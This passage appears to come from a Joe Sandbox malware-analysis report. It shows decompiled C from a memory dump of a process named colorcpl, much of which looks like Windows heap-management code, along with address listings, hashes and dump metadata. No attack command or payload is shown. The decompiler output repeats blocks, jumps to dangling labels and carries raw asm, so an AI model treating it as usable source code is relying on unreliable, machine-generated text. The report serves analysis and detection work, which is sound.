							_t434 = E043528C0(_t437, _v108 | 0x00000002, _t339, _v124);
							_t260 =  *0x4436834; // 0x0
							if((_t260 & 0x00000001) != 0) {
								__eflags = _t260 & 0x00000002;
								if((_t260 & 0x00000002) == 0) {
									goto L16;
								}
								_t339 =  *[fs:0x30];
								__eflags =  *(_t339 + 0x18);
								if( *(_t339 + 0x18) == 0) {
									goto L16;
								}
								_push( *0x443446c);
								_t268 = E04409682( *0x4434468);
								__eflags = _t437 -  *_t268;
								if(_t437 ==  *_t268) {
									goto L16;
								}
								__eflags = _t434;
								if(_t434 == 0) {
									L145:
									_v124 = _v124 - (_v120 & 0x0000ffff);
									__eflags = _v116;
									if(_v116 != 0) {
										_t435 = _v112;
										E0436B870(_t339, _t437, 0, _v112);
										_t264 = E043ED130(_t437, _v108, _v112, _t339, _v120, _v116);
										_t339 = _v116;
										_t386 = _t437;
										E043E78DE(_v116, _t437, _t264, 6, _t435);
									}
									goto L147;
								}
								_t339 = _v108;
								__eflags = _t339 & 0x10000000;
								if((_t339 & 0x10000000) != 0) {
									L17:
									if(_t434 == 0) {
										goto L145;
									} else {
										_t386 = _v116;
										_t229 = _t434;
										if(_v116 != 0) {
											_t266 = E043ED130(_t437, _t339, _t434, _t339, _v120, _t386);
											_t386 = _t437;
											_v128 = _t266;
											E043E78DE(_v116, _t437, _t266, 6, _t434);
											_t229 = _v128;
										}
										goto L19;
									}
								}
								E043FE8B1(_t437, _v112);
								_t386 = _t434;
								E043FDF93(_t437, _t434);
							}
							L16:
							_t339 = _v108;
							goto L17;
						}
						if((_t339 & 0x00000007) == 0) {
							__eflags =  *((char*)(_t339 - 1)) - 5;
							_t432 = _t339 - 8;
							if( *((char*)(_t339 - 1)) == 5) {
								_t432 = _t432 - (( *(_t432 + 6) & 0x000000ff) << 3);
								__eflags = _t432;
							}
							__eflags =  *(_t432 + 7) & 0x0000003f;
							if(( *(_t432 + 7) & 0x0000003f) != 0) {
								goto L13;
							} else {
								_push(0);
								_push(0);
								_push(0);
								_push(_t432);
								_t385 = 8;
								goto L11;
							}
						} else {
							_push(0);
							_push(0);
							_push(0);
							_push(_t339);
							_t385 = 9;
							L11:
							_t386 = _t437;
							E04405FED(_t385, _t437);
							_t432 = 0;
							goto L12;
						}
					}
					_t386 =  *(_t437 + 0xdc);
					_t334 =  *(_t437 + 0xdc);
					if(_t334 != 0) {
						L51:
						_t428 = _v124;
						__eflags = _v124 - _t334;
						if(__eflags <= 0) {
							goto L8;
						}
						_t335 =  *(_t437 + 0xe0);
						__eflags = _t335;
						if(_t335 != 0) {
							_t386 = _t437;
							_t339 = 0x14;
							E04405FED(0x14, _t437, 0, _t335, _t428, _t437);
						}
						goto L147;
					}
					_t334 =  *0x4434334; // 0x0
					if(_t334 != 0) {
						goto L51;
					}
					goto L8;
				}
			}

0x04352760
0x04352763
0x04352772
0x04352776
0x04352782
0x04352789
0x0435278b
0x0435278e
0x04352791
0x04352794
0x04352797
0x0435279a
0x043527a1
0x043527a9
0x043527ac
0x043527b1
0x043a61eb
0x043a61fa
0x043a67f4
0x043a67f4
0x0435287e
0x04352881
0x04352884
0x04352890
0x04352890
0x043527be
0x043a6209
0x043a620b
0x043a6211
0x043a6214
0x043a6216
0x043a6218
0x043a621f
0x043a6222
0x043a6224
0x043a6224
0x043a6227
0x043a6227
0x043a6222
0x043a622a
0x043a6231
0x043a6234
0x043a6236
0x043a623f
0x043a623f
0x043a6238
0x043a6238
0x043a623b
0x043a623b
0x043a6241
0x043a6244
0x043a6247
0x043a624a
0x043a624d
0x043a630a
0x043a630c
0x043a630f
0x043a6311
0x00000000
0x00000000
0x043a6317
0x043a631a
0x00000000
0x043a6320
0x043a6320
0x043a6327
0x043a632a
0x043a632c
0x043a6330
0x043a6333
0x043a6336
0x043a6338
0x043a6338
0x043a633a
0x043a633a
0x043a633d
0x043a6340
0x043a6342
0x043a6344
0x043a6344
0x00000000
0x043a6342
0x043a6253
0x043a6253
0x043a6253
0x043a6255
0x043a6264
0x043a6269
0x043a6269
0x043a6272
0x043a6275
0x043a6278
0x043a627e
0x043a6283
0x043a6287
0x043a628a
0x043a6292
0x043a6295
0x043a629b
0x043a62a1
0x043a62a2
0x043a62a9
0x043a62b0
0x043a62b7
0x043a62be
0x043a62c3
0x043a62c3
0x043a62c6
0x043a62c8
0x043a62cd
0x043a62cf
0x043a62d2
0x043a62d8
0x043a62da
0x043a62e4
0x043a62e9
0x043a62ee
0x043a62f3
0x043a62f3
0x043a62da
0x00000000
0x043a62d2
0x043a628c
0x043a6290
0x00000000
0x00000000
0x00000000
0x043a6290
0x043a624d
0x043527c6
0x043a634b
0x043a634b
0x043527ce
0x043a6358
0x043a6358
0x043527de
0x043527e1
0x043a6366
0x00000000
0x043527e7
0x043527ee
0x0435280d
0x04352811
0x043a639f
0x043a63a8
0x04352831
0x04352831
0x04352834
0x04352836
0x043a63af
0x043a67a4
0x043a67b2
0x043a67b8
0x043a67bd
0x043a67c1
0x043a67c4
0x043a67c9
0x043a67cf
0x043a67d0
0x043a67d3
0x043a67da
0x043a67e1
0x043a67e8
0x043a67ef
0x043a67ef
0x00000000
0x043a67c4
0x04352840
0x043a63b9
0x043a63bd
0x043a63d7
0x043a63db
0x043a6400
0x043a6400
0x043a6404
0x043a642d
0x043a6431
0x043a6442
0x043a6433
0x043a6433
0x043a6435
0x043a6438
0x043a643a
0x043a643a
0x043a643a
0x043a643d
0x043a643d
0x043a6406
0x043a640f
0x043a6415
0x043a6418
0x043a6423
0x043a6423
0x043a6425
0x043a641a
0x043a641a
0x043a641a
0x043a6427
0x043a6427
0x043a6445
0x043a644c
0x043a644f
0x043a6452
0x043a6479
0x043a6454
0x043a6454
0x043a6458
0x043a6469
0x043a645a
0x043a645a
0x043a645c
0x043a645f
0x043a6461
0x043a6461
0x043a6461
0x043a6464
0x043a6464
0x043a6474
0x043a6474
0x043a6483
0x043a6485
0x043a64b0
0x043a64b0
0x043a64ba
0x043a64bd
0x00000000
0x00000000
0x043a64c3
0x043a64c6
0x043a64c8
0x043a64da
0x043a64dc
0x043a64ef
0x043a64ef
0x043a64de
0x043a64e7
0x043a64ea
0x043a64ea
0x043a64ca
0x043a64d2
0x043a64d5
0x043a64d5
0x043a64f1
0x043a64f4
0x043a64fa
0x043a64fd
0x043a6500
0x043a6503
0x043a6506
0x043a6509
0x043a679f
0x043a679f
0x00000000
0x043a650f
0x043a650f
0x043a6512
0x043a6514
0x043a6524
0x043a6524
0x043a6516
0x043a651f
0x043a651f
0x043a652d
0x043a6530
0x043a6532
0x043a6537
0x043a6539
0x043a6545
0x043a6548
0x043a654b
0x043a65dc
0x043a65df
0x043a65ed
0x043a65f0
0x043a6603
0x043a6605
0x043a660f
0x043a6611
0x043a663a
0x043a663e
0x043a664f
0x043a6640
0x043a6640
0x043a6642
0x043a6645
0x043a6647
0x043a6647
0x043a6647
0x043a664a
0x043a664a
0x043a6613
0x043a661c
0x043a6622
0x043a6625
0x043a6630
0x043a6630
0x043a6632
0x043a6627
0x043a6627
0x043a6627
0x043a6634
0x043a6634
0x043a6658
0x043a6607
0x043a660a
0x043a660a
0x043a65f2
0x043a65f8
0x043a65f8
0x043a65e1
0x043a65e9
0x043a65e9
0x043a665c
0x043a665f
0x043a6662
0x043a6664
0x043a6690
0x043a6694
0x043a66a5
0x043a6696
0x043a6696
0x043a6698
0x043a669b
0x043a669d
0x043a669d
0x043a669d
0x043a66a0
0x043a66a0
0x043a6666
0x043a666f
0x043a6675
0x043a6678
0x043a6683
0x043a6683
0x043a6685
0x043a667a
0x043a667a
0x043a667a
0x043a6687
0x043a668b
0x043a668b
0x043a66a8
0x043a66ab
0x043a66ae
0x043a66b1
0x043a66c3
0x043a66cf
0x043a66cf
0x043a66d1
0x043a66b3
0x043a66bb
0x043a66bb
0x043a6551
0x043a6554
0x043a6557
0x043a6559
0x043a655b
0x043a6563
0x043a6568
0x043a6568
0x043a656b
0x043a656f
0x043a6574
0x043a6578
0x043a6584
0x043a6589
0x043a658b
0x043a658d
0x043a6592
0x043a6592
0x043a6597
0x043a6597
0x043a659d
0x043a65a1
0x043a65a4
0x043a65a8
0x043a65ab
0x043a65b7
0x043a65bd
0x043a65bd
0x043a65bd
0x043a65c2
0x043a65c4
0x043a65c6
0x043a65cc
0x043a65d2
0x043a65d2
0x043a65c6
0x043a66d4
0x043a66d4
0x043a66d7
0x00000000
0x043a653b
0x043a653b
0x00000000
0x043a653b
0x043a6539
0x043a6487
0x043a6487
0x043a6487
0x043a648b
0x043a6491
0x043a6493
0x043a6498
0x043a649d
0x043a64a1
0x043a64ad
0x00000000
0x043a64ad
0x043a64a3
0x00000000
0x043a64a3
0x043a6485
0x043a63e2
0x043a63f5
0x043a63f7
0x043a63fa
0x00000000
0x00000000
0x00000000
0x043a63fa
0x043a63c3
0x043a63c8
0x043a63cb
0x043a63ce
0x043a63d0
0x00000000
0x00000000
0x00000000
0x043a63d2
0x04352846
0x0435284d
0x04352857
0x04352859
0x04352860
0x043a66df
0x043a66e1
0x00000000
0x00000000
0x043a66e7
0x043a66ee
0x043a66f2
0x00000000
0x00000000
0x043a66f8
0x043a6704
0x043a6709
0x043a670b
0x00000000
0x00000000
0x043a6711
0x043a6713
0x043a6764
0x043a676a
0x043a676d
0x043a6771
0x043a6773
0x043a677a
0x043a678c
0x043a6791
0x043a6794
0x043a679a
0x043a679a
0x00000000
0x043a6771
0x043a6715
0x043a6718
0x043a671e
0x04352869
0x0435286b
0x00000000
0x04352871
0x04352871
0x04352874
0x04352878
0x043a6746
0x043a674e
0x043a6754
0x043a6757
0x043a675c
0x043a675c
0x00000000
0x04352878
0x0435286b
0x043a6729
0x043a672e
0x043a6732
0x043a6732
0x04352866
0x04352866
0x00000000
0x04352866
0x0435281a
0x04352893
0x04352897
0x0435289a
0x043528a3
0x043528a3
0x043528a3
0x043528a5
0x043528a9
0x00000000
0x043528ab
0x043528ab
0x043528ad
0x043528af
0x043528b1
0x043528b2
0x00000000
0x043528b2
0x0435281c
0x0435281c
0x0435281e
0x04352820
0x04352822
0x04352823
0x04352828
0x04352828
0x0435282a
0x0435282f
0x00000000
0x0435282f
0x0435281a
0x043527f0
0x043527f6
0x043527fa
0x043a6370
0x043a6370
0x043a6373
0x043a6375
0x00000000
0x00000000
0x043a637b
0x043a6381
0x043a6383
0x043a638e
0x043a6390
0x043a6395
0x043a6395
0x00000000
0x043a6383
0x04352800
0x04352807
0x00000000
0x00000000
0x00000000
0x04352807

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebfa56700d44a203e23bf6fb101bbe7ac1f53739c4d821935451e34c1a59a14c
Instruction ID: 8d344741886bee3c2a92b7b9515a7e80003148fc1d648ca62484a895bdc41315
Opcode Fuzzy Hash: ebfa56700d44a203e23bf6fb101bbe7ac1f53739c4d821935451e34c1a59a14c
Instruction Fuzzy Hash: 2332EF30A00B558BEB24CF69C855BBEBBF6EF84704F28911DD4869B694D735B822CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0440124C Relevance: .6, Instructions: 571
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E0440124C(signed int* __ecx, char __edx) {
				signed int* _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				signed int* _t202;
				signed int _t204;
				signed int _t206;
				signed int* _t207;
				signed int _t216;
				char* _t218;
				signed int _t219;
				void* _t222;
				signed int** _t228;
				signed int _t233;
				signed int _t241;
				void* _t242;
				signed int** _t248;
				signed int _t255;
				signed int _t259;
				signed int _t261;
				signed int _t263;
				signed int _t278;
				void* _t281;
				unsigned int* _t283;
				intOrPtr _t291;
				signed int _t292;
				char* _t312;
				signed int* _t317;
				signed int _t318;
				intOrPtr* _t319;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t331;
				void* _t348;
				void* _t356;
				signed int _t360;
				signed int _t376;
				signed int _t404;
				signed int _t405;
				void* _t406;
				signed char _t407;
				signed int _t408;
				signed int* _t409;
				signed char _t411;
				signed int* _t412;
				signed int _t416;
				signed char _t418;
				signed int* _t421;
				signed int* _t430;
				signed int _t444;
				signed int _t445;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int* _t451;
				intOrPtr* _t452;
				signed int* _t453;
				signed int _t454;
				signed int _t455;
				signed char* _t459;
				void* _t460;
				void* _t462;
				signed int* _t463;
				void* _t484;

				_t317 = __ecx;
				_v40 = __edx;
				_v8 = __ecx;
				while(1) {
					L1:
					_t3 =  &(_t317[1]); // 0x4434804
					_t202 = _t3;
					goto L2;
					do {
						while(1) {
							L2:
							_t404 =  *_t202;
							_v12 = _t404;
							if(_t404 == 0) {
								goto L31;
							} else {
								_v24 = _v24 & 0x00000000;
								_t283 = _t404 + 0x10;
								_v20 = _t283;
								_t336 =  *_t317;
								_t454 =  *( *_t317 + 0xc);
								_v32 = _t454;
								if( *_t283 >> 0x10 < 0) {
									_t11 =  &(_t317[0x17]); // 0x0
									_t448 =  *_t11 & 0x0000ffff;
									_t336 = 1;
									_v24 = 1;
									if((1 &  *(_t454 + 0x1bf + _t448 * 4)) == 0) {
										_t336 = _t454;
										if(E0433E202(_t454,  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff) >= 0) {
											_t336 = 1;
											 *(_t454 + 0x1bf + _t448 * 4) =  *(_t454 + 0x1bf + _t448 * 4) | 1;
											if(E04353C40() == 0) {
												_t312 = 0x7ffe0380;
											} else {
												_t312 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											}
											if( *_t312 != 0) {
												_t336 = 1;
												if(( *( *[fs:0x30] + 0x240) & 1) != 0) {
													_t336 =  *(_t454 + 0xc);
													E043FEE78( *(_t454 + 0xc),  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff);
												}
											}
										}
										_t404 = _v12;
									}
								}
								asm("sbb eax, eax");
								_t445 = 0;
								_v28 = 0;
							}
							do {
								L14:
								_t455 =  *(_t404 + 0x10);
								if((_t455 >> 0x00000010 & 0x00008000) != 0) {
									goto L17;
								}
								if(_t455 == 0) {
									L26:
									_t406 = 0;
									L27:
									if(_v24 != 0) {
										_t291 =  *0x4434364; // 0x3
										_t60 = _t291 + 1; // 0x4
										_t484 = _t60 -  *0x4434360; // 0x10
										if(_t484 < 0) {
											asm("lock cmpxchg [esi], ecx");
										}
									}
									if(_t406 != 0) {
										L131:
										return _t406;
									} else {
										goto L31;
									}
								}
								_t336 = _t455 | 0x80000000;
								asm("lock cmpxchg [ebx], ecx");
								_t317 = _v8;
								if(_t455 == _t455) {
									L19:
									if(_t455 == 0xffffffff) {
										goto L26;
									}
									_t292 =  *((intOrPtr*)(_t404 + 4));
									_v16 = _t292;
									if(_t292 == 0 ||  *_t404 != _t317 || _t455 == 0) {
										 *_v20 = _t455;
										goto L26;
									} else {
										_t45 =  &(_t317[0x17]); // 0x0
										_t46 = ( *_t45 & 0x0000ffff) + 0x431bf30; // 0x20202020
										_t447 = E04397A51(_v16 + 0x14,  *((E04397AF9(_t336) & 0x0000ffff) + 0x4434200) & 0x000000ff,  *_t46 & 0x000000ff);
										_t457 = _v16;
										 *_v20 = (_t455 & 0x0000ffff) - 0x00000001 | _t447 << 0x00000010;
										_t406 = (( *(_v16 + 0x10) ^  *0x4436964 ^ _v16 ^ _v32) & 0x0000ffff) + (( *(_v16 + 0x10) ^  *0x4436964 ^ _v16 ^ _v32) >> 0x10) * _t447 + _t457;
										if(( *(_t406 + 7) & 0x0000003f) != 0) {
											_push(0);
											_push(0);
											_push(0);
											_push(_t406);
											_t348 = 0xf;
											E04405FED(_t348,  *((intOrPtr*)( *( *_t317 + 0xc) + 0xc)));
											_t406 = 0;
										}
										goto L27;
									}
								}
								L17:
								_t445 = _t445 + 1;
							} while (_t445 <= _v28);
							_t455 = _t455 | 0xffffffff;
							goto L19;
							L31:
							_v28 =  *_t317;
							_t64 =  &(_t317[2]); // 0x4434808
							_t204 = _t64;
							_v16 = _t204;
							while(1) {
								_t444 = 0;
								while(1) {
									L33:
									_t318 = 0;
									_v20 = 0x10;
									_v24 = _v24 & 0;
									_t331 = _t204;
									_v12 = _t331;
									do {
										L34:
										_t405 =  *_t331;
										_t451 = _v8;
										_v32 = _t405;
										if(_t405 != 0) {
											_t206 =  *(_t405 + 0x10) & 0x0000ffff;
											_v36 = _t206;
											if(_t206 > _v24) {
												_t281 = E0437BF0C(_t451, _t405);
												_t331 = _v12;
												if(_t281 == 0) {
													_t318 = _t331;
													_t444 = _v32;
													_v24 = _v36;
												}
											}
										}
										_t331 = _t331 + 4;
										_t79 =  &_v20;
										 *_t79 = _v20 - 1;
										_v12 = _t331;
									} while ( *_t79 != 0);
									_v24 = _t444;
									if(_t318 == 0) {
										_t444 = 0;
										L55:
										if(_t444 == 0) {
											_t207 = _v8;
											_t452 = 0;
											_t111 = _t207 + 0x5c; // 0x0
											_t211 =  *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x3c0 + ( *_t111 & 0x0000ffff) * 4)) + 0x48;
											_v16 = 0;
											_v24 = 0;
											_v20 =  *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x3c0 + ( *_t111 & 0x0000ffff) * 4)) + 0x48;
											while(1) {
												_t319 = E0436FE50(_t211);
												_v28 = _t319;
												if(_t319 == 0) {
													break;
												}
												_t121 = _t319 - 0x20; // -32
												_t444 = _t121;
												_t122 = _t444 + 0x1c; // -4
												_t421 = _t122;
												if((1 &  *_t421) == 0) {
													_t323 = 0xfffffffd;
													_t255 =  *_t421;
													do {
														asm("lock cmpxchg [edx], ecx");
													} while ((_t255 & _t323) != 0);
													_t324 = _v28;
													if(_t255 != 2) {
														L87:
														_t211 = _v20;
														_t444 = 0;
														continue;
													}
													L86:
													 *_t444 =  *_t444 & 0x00000000;
													E043520E0( *( *_t444), _t324);
													goto L87;
												}
												if(E04382670(_t444, _v8) == 0) {
													_t259 = _v16;
													if(_t259 == 0) {
														_v24 = _t319;
													}
													 *_t319 = _t452;
													_t452 = _t319;
													_v16 = _t259 + 1;
													goto L87;
												}
												_t126 = _t444 + 0x1c; // -4
												_t325 = 0xfffffffd;
												_t261 =  *_t126;
												do {
													asm("lock cmpxchg [edx], ecx");
												} while ((_t261 & _t325) != 0);
												_t324 = _v28;
												if(_t261 == 2) {
													goto L86;
												}
												if(E04353AF6(_v8, _t444) == 0) {
													goto L87;
												}
												break;
											}
											_t335 = _v16;
											if(_v16 != 0) {
												E043CE9B0(_v20, _t452, _v24, _t335);
											}
											L70:
											if(_t444 == 0) {
												_t406 = 0;
												goto L131;
											}
											_t133 = _t444 + 0x1c; // 0x1c
											_t453 = _t133;
											 *((char*)(_t444 + 0x1b)) = _v40;
											while(1) {
												_t317 = _v8;
												_t407 =  *_t453;
												_t136 =  &(_t317[1]); // 0x4434804
												_t202 = _t136;
												if(_t407 == 0) {
													break;
												}
												_t137 =  &(_t317[1]); // 0x4434804
												_t202 = _t137;
												if((_t407 & 0x00000006) != 0) {
													while(1) {
														L2:
														_t404 =  *_t202;
														_v12 = _t404;
														if(_t404 == 0) {
															goto L31;
														} else {
															_v24 = _v24 & 0x00000000;
															_t283 = _t404 + 0x10;
															_v20 = _t283;
															_t336 =  *_t317;
															_t454 =  *( *_t317 + 0xc);
															_v32 = _t454;
															if( *_t283 >> 0x10 < 0) {
																_t11 =  &(_t317[0x17]); // 0x0
																_t448 =  *_t11 & 0x0000ffff;
																_t336 = 1;
																_v24 = 1;
																if((1 &  *(_t454 + 0x1bf + _t448 * 4)) == 0) {
																	_t336 = _t454;
																	if(E0433E202(_t454,  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff) >= 0) {
																		_t336 = 1;
																		 *(_t454 + 0x1bf + _t448 * 4) =  *(_t454 + 0x1bf + _t448 * 4) | 1;
																		if(E04353C40() == 0) {
																			_t312 = 0x7ffe0380;
																		} else {
																			_t312 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
																		}
																		if( *_t312 != 0) {
																			_t336 = 1;
																			if(( *( *[fs:0x30] + 0x240) & 1) != 0) {
																				_t336 =  *(_t454 + 0xc);
																				E043FEE78( *(_t454 + 0xc),  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff);
																			}
																		}
																	}
																	_t404 = _v12;
																}
															}
															asm("sbb eax, eax");
															_t445 = 0;
															_v28 = 0;
														}
														goto L14;
													}
												}
												asm("lock cmpxchg [esi], ecx");
												if(_t407 != _t407) {
													continue;
												}
												_t216 =  *_t444;
												_v36 = _t216;
												if(_t216 == _t317) {
													L105:
													if(E04353C40() == 0) {
														_t218 = 0x7ffe0380;
													} else {
														_t218 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
													}
													if( *_t218 != 0 && ( *( *[fs:0x30] + 0x240) & 1) != 0) {
														E043FF409( *((intOrPtr*)( *( *_t317 + 0xc) + 0xc)),  *((intOrPtr*)(_t444 + 4)));
													}
													_t174 =  &(_t317[1]); // 0x4434804
													_t202 = _t174;
													_t175 = _t444;
													_t444 =  *_t202;
													 *_t202 = _t175;
													if(_t444 == 0) {
														break;
														do {
															do {
																do {
																	while(1) {
																		L2:
																		_t404 =  *_t202;
																		_v12 = _t404;
																		if(_t404 == 0) {
																			goto L31;
																		} else {
																			_v24 = _v24 & 0x00000000;
																			_t283 = _t404 + 0x10;
																			_v20 = _t283;
																			_t336 =  *_t317;
																			_t454 =  *( *_t317 + 0xc);
																			_v32 = _t454;
																			if( *_t283 >> 0x10 < 0) {
																				_t11 =  &(_t317[0x17]); // 0x0
																				_t448 =  *_t11 & 0x0000ffff;
																				_t336 = 1;
																				_v24 = 1;
																				if((1 &  *(_t454 + 0x1bf + _t448 * 4)) == 0) {
																					_t336 = _t454;
																					if(E0433E202(_t454,  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff) >= 0) {
																						_t336 = 1;
																						 *(_t454 + 0x1bf + _t448 * 4) =  *(_t454 + 0x1bf + _t448 * 4) | 1;
																						if(E04353C40() == 0) {
																							_t312 = 0x7ffe0380;
																						} else {
																							_t312 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
																						}
																						if( *_t312 != 0) {
																							_t336 = 1;
																							if(( *( *[fs:0x30] + 0x240) & 1) != 0) {
																								_t336 =  *(_t454 + 0xc);
																								E043FEE78( *(_t454 + 0xc),  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff);
																							}
																						}
																					}
																					_t404 = _v12;
																				}
																			}
																			asm("sbb eax, eax");
																			_t445 = 0;
																			_v28 = 0;
																		}
																		goto L14;
																	}
																	goto L105;
																} while (_t444 == 0);
																goto L112;
																L88:
																_t242 = E04353AF6(_v36, _t444);
																_t147 =  &(_t317[1]); // 0x4434804
																_t202 = _t147;
															} while (_t242 == 0);
															while(1) {
																_t418 =  *_t453;
																_t148 =  &(_t317[1]); // 0x4434804
																_t202 = _t148;
																if(_t418 == 0) {
																	goto L2;
																}
																_t149 =  &(_t317[1]); // 0x4434804
																_t202 = _t149;
																if((_t418 & 0x00000002) != 0) {
																	while(1) {
																		L2:
																		_t404 =  *_t202;
																		_v12 = _t404;
																		if(_t404 == 0) {
																			goto L31;
																		} else {
																			_v24 = _v24 & 0x00000000;
																			_t283 = _t404 + 0x10;
																			_v20 = _t283;
																			_t336 =  *_t317;
																			_t454 =  *( *_t317 + 0xc);
																			_v32 = _t454;
																			if( *_t283 >> 0x10 < 0) {
																				_t11 =  &(_t317[0x17]); // 0x0
																				_t448 =  *_t11 & 0x0000ffff;
																				_t336 = 1;
																				_v24 = 1;
																				if((1 &  *(_t454 + 0x1bf + _t448 * 4)) == 0) {
																					_t336 = _t454;
																					if(E0433E202(_t454,  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff) >= 0) {
																						_t336 = 1;
																						 *(_t454 + 0x1bf + _t448 * 4) =  *(_t454 + 0x1bf + _t448 * 4) | 1;
																						if(E04353C40() == 0) {
																							_t312 = 0x7ffe0380;
																						} else {
																							_t312 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
																						}
																						if( *_t312 != 0) {
																							_t336 = 1;
																							if(( *( *[fs:0x30] + 0x240) & 1) != 0) {
																								_t336 =  *(_t454 + 0xc);
																								E043FEE78( *(_t454 + 0xc),  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff);
																							}
																						}
																					}
																					_t404 = _v12;
																				}
																			}
																			asm("sbb eax, eax");
																			_t445 = 0;
																			_v28 = 0;
																		}
																		goto L14;
																	}
																}
																asm("lock cmpxchg [esi], ecx");
																if(_t418 != _t418) {
																	continue;
																}
																_t376 =  *_t444;
																_t462 = 0;
																_v24 = _t376;
																do {
																	_t248 = _t376 + ((( *(_t376 + 0x5e) & 0x0000ffff) + _t462 & 0x0000000f) + 2) * 4;
																	_t412 =  *_t248;
																	_v28 = _t248;
																	if(_t412 != 0) {
																		if((_t412[7] & 0x00000001) != 0) {
																			goto L99;
																		}
																		asm("lock cmpxchg [ebx], ecx");
																		_t317 = _v8;
																		if(_t412 == _t412) {
																			goto L101;
																		}
																		L98:
																		_t376 = _v24;
																		goto L99;
																	}
																	asm("lock cmpxchg [edx], ecx");
																	_t158 =  &(_t317[1]); // 0x4434804
																	_t202 = _t158;
																	if(0 == 0) {
																		goto L2;
																	}
																	goto L98;
																	L99:
																	_t462 = _t462 + 1;
																} while (_t462 < 0x10);
																goto L127;
															}
															goto L2;
														} while (_t222 == 0);
														goto L116;
													} else {
														L112:
														_t176 = _t444 + 0x1c; // 0x1c
														_t459 = _t176;
														_t408 = 0xfffffff9;
														_t219 =  *_t459;
														do {
															asm("lock cmpxchg [esi], ecx");
														} while ((_t219 & _t408) != 0);
														if(_t219 == 6) {
															L79:
															_t356 =  *( *_t444);
															 *_t444 =  *_t444 & 0x00000000;
															L128:
															_t201 = _t444 + 0x20; // 0x20
															_t409 = _t201;
															L129:
															E043520E0(_t356, _t409);
															goto L1;
														}
														L115:
														_t222 = E04353AF6(_t317, _t444);
														_t177 =  &(_t317[1]); // 0x4434804
														_t202 = _t177;
														if(_t222 == 0) {
															while(1) {
																L2:
																_t404 =  *_t202;
																_v12 = _t404;
																if(_t404 == 0) {
																	goto L31;
																} else {
																	_v24 = _v24 & 0x00000000;
																	_t283 = _t404 + 0x10;
																	_v20 = _t283;
																	_t336 =  *_t317;
																	_t454 =  *( *_t317 + 0xc);
																	_v32 = _t454;
																	if( *_t283 >> 0x10 < 0) {
																		_t11 =  &(_t317[0x17]); // 0x0
																		_t448 =  *_t11 & 0x0000ffff;
																		_t336 = 1;
																		_v24 = 1;
																		if((1 &  *(_t454 + 0x1bf + _t448 * 4)) == 0) {
																			_t336 = _t454;
																			if(E0433E202(_t454,  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff) >= 0) {
																				_t336 = 1;
																				 *(_t454 + 0x1bf + _t448 * 4) =  *(_t454 + 0x1bf + _t448 * 4) | 1;
																				if(E04353C40() == 0) {
																					_t312 = 0x7ffe0380;
																				} else {
																					_t312 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
																				}
																				if( *_t312 != 0) {
																					_t336 = 1;
																					if(( *( *[fs:0x30] + 0x240) & 1) != 0) {
																						_t336 =  *(_t454 + 0xc);
																						E043FEE78( *(_t454 + 0xc),  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff);
																					}
																				}
																			}
																			_t404 = _v12;
																		}
																	}
																	asm("sbb eax, eax");
																	_t445 = 0;
																	_v28 = 0;
																}
																goto L14;
															}
														} else {
															goto L116;
														}
														while(1) {
															L116:
															_t411 =  *_t459;
															_t178 =  &(_t317[1]); // 0x4434804
															_t202 = _t178;
															if(_t411 == 0) {
																goto L2;
															}
															_t179 =  &(_t317[1]); // 0x4434804
															_t202 = _t179;
															if((_t411 & 0x00000002) != 0) {
																while(1) {
																	L2:
																	_t404 =  *_t202;
																	_v12 = _t404;
																	if(_t404 == 0) {
																		goto L31;
																	} else {
																		_v24 = _v24 & 0x00000000;
																		_t283 = _t404 + 0x10;
																		_v20 = _t283;
																		_t336 =  *_t317;
																		_t454 =  *( *_t317 + 0xc);
																		_v32 = _t454;
																		if( *_t283 >> 0x10 < 0) {
																			_t11 =  &(_t317[0x17]); // 0x0
																			_t448 =  *_t11 & 0x0000ffff;
																			_t336 = 1;
																			_v24 = 1;
																			if((1 &  *(_t454 + 0x1bf + _t448 * 4)) == 0) {
																				_t336 = _t454;
																				if(E0433E202(_t454,  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff) >= 0) {
																					_t336 = 1;
																					 *(_t454 + 0x1bf + _t448 * 4) =  *(_t454 + 0x1bf + _t448 * 4) | 1;
																					if(E04353C40() == 0) {
																						_t312 = 0x7ffe0380;
																					} else {
																						_t312 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
																					}
																					if( *_t312 != 0) {
																						_t336 = 1;
																						if(( *( *[fs:0x30] + 0x240) & 1) != 0) {
																							_t336 =  *(_t454 + 0xc);
																							E043FEE78( *(_t454 + 0xc),  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff);
																						}
																					}
																				}
																				_t404 = _v12;
																			}
																		}
																		asm("sbb eax, eax");
																		_t445 = 0;
																		_v28 = 0;
